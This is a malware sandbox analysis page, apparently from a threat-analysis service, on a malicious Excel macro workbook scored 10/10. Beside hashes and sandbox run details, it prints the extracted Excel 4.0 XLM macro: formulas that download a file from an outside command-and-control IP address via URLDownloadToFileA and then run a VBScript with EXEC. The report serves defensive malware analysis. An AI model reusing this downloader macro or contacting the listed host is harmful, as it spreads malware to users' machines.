7464432e55d2e9a1ad084760d3c29751 | Triage

Submit
Reports

Overview

overview

Static

static

7464432e55...1.xlsm

windows7-x64

7464432e55...1.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

7464432e55d2e9a1ad084760d3c29751.xlsm

Resource

win7-20231129-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

7464432e55d2e9a1ad084760d3c29751.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

8 signatures

150 seconds

General

Target

7464432e55d2e9a1ad084760d3c29751
Size

6KB
MD5

7464432e55d2e9a1ad084760d3c29751
SHA1

4b6e3a12bdf7672507ae3fb0687d329c27ca7674
SHA256

9f2860d42068d03c50977f80558ad7f55c27cd0b72bba1afa0525952ca024f71
SHA512

b7414d94087f966e4c2ea832076dedcae192c279c89d715c4f669c74b834f7b00bfef084efc433d0eb3cd6aa3f439ec1fee227970aa799b2c6957e8276305785
SSDEEP

192:NDSJuSDbrA2OmmfR+8UhHFBFYuYb98yFA/+R:Niu8M2wc1FY5b98yFAG

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

7464432e55d2e9a1ad084760d3c29751
.xlsm office2007

© 2018-2025

Terms | Privacy